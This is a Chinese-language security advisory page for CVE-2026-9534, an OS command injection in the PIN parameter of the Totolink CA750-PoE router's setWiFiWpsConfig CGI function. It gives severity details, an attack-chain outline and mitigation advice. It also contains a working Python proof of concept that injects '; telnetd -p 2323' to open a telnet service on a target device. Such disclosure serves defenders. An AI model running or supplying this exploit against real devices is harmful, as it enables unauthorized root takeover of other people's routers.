IPBUF安全漏洞报告
English
CVE-2026-9534 CVSS 6.3 中危

CVE-2026-9534 Totolink CA750-PoE 命令注入漏洞

披露日期: 2026-05-26

漏洞信息

漏洞编号
CVE-2026-9534
漏洞类型
操作系统命令注入
CVSS评分
6.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Totolink CA750-PoE

相关标签

命令注入RCEIoTTotolink路由器漏洞

漏洞概述

Totolink CA750-PoE 6.2c.510版本被曝出存在严重的操作系统命令注入漏洞。该漏洞源于/cgi-bin/cstecgi.cgi组件中的setWiFiWpsConfig函数未能有效过滤用户输入的PIN参数。攻击者无需用户交互,仅需网络访问权限即可发送特制数据包,在目标设备上远程执行任意系统命令。此漏洞可能导致设备被完全控制,不仅影响机密性和完整性,还直接威胁系统可用性。鉴于相关利用代码已发布,风险极高,用户需立即采取行动。

技术细节

该漏洞的根源在于Totolink CA750-PoE设备在处理WPS配置请求时存在输入验证缺失。具体来说,设备后端的CGI脚本/cgi-bin/cstecgi.cgi接收用户提交的JSON或表单数据,并传递给内部的setWiFiWpsConfig函数进行处理。在该函数中,PIN参数被直接拼接到系统执行的Shell命令中,而未经过任何安全过滤或转义。攻击者可以通过构造恶意的HTTP POST请求,向目标设备发送特制的PIN数据。例如,利用分号(;)、管道符(|)或反引号(`)等Shell元字符截断原有命令并注入任意操作系统指令。由于CVSS向量显示攻击复杂度低且无需用户交互,攻击者能够远程执行任意代码,从而获取设备控制权、窃取敏感信息或造成服务拒绝。

攻击链分析

STEP 1
侦察
攻击者扫描网络,识别出运行Totolink CA750-PoE固件版本6.2c.510的设备,并确认/cgi-bin/cstecgi.cgi接口可访问。
STEP 2
构造载荷
攻击者利用Shell元字符(如分号)构造恶意的PIN参数,该参数旨在闭合原有命令并注入新的系统指令(如启动Telnet服务或反弹Shell)。
STEP 3
发送请求
攻击者向目标设备的/cgi-bin/cstecgi.cgi端点发送包含恶意PIN参数的HTTP POST请求,调用setWiFiWpsConfig函数。
STEP 4
执行命令
后端CGI脚本未对PIN参数进行过滤,直接将其传递给系统Shell执行,导致攻击者的恶意命令在设备上以Root权限运行。
STEP 5
建立控制
攻击者成功获取设备访问权限,可进一步植入后门、窃取数据或发起横向移动。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL url = "http://<TARGET_IP>/cgi-bin/cstecgi.cgi" # Payload to inject command (e.g., telnetd enable or simple ping) # Using semicolon to bypass original command logic injected_cmd = "; telnetd -p 2323" # Construct data payload based on vulnerable function setWiFiWpsConfig payload_data = { "function": "setWiFiWpsConfig", "PIN": injected_cmd } headers = { "Content-Type": "application/json", "User-Agent": "CVE-2026-9534-Scanner" } try: # Send the malicious request response = requests.post(url, json=payload_data, headers=headers, timeout=10) if response.status_code == 200: print("[+] Payload sent successfully.") print(f"[+] Response: {response.text}") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

影响范围

Totolink CA750-PoE 6.2c.510

防御指南

临时缓解措施
建议用户立即检查设备固件版本,若为6.2c.510,请暂时关闭设备的WPS功能及远程Web管理界面。在未获得官方修复补丁前,应严格限制内网对路由器的访问权限,仅允许信任的IP地址进行管理操作,并监控网络流量中是否存在异常的CGI请求。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表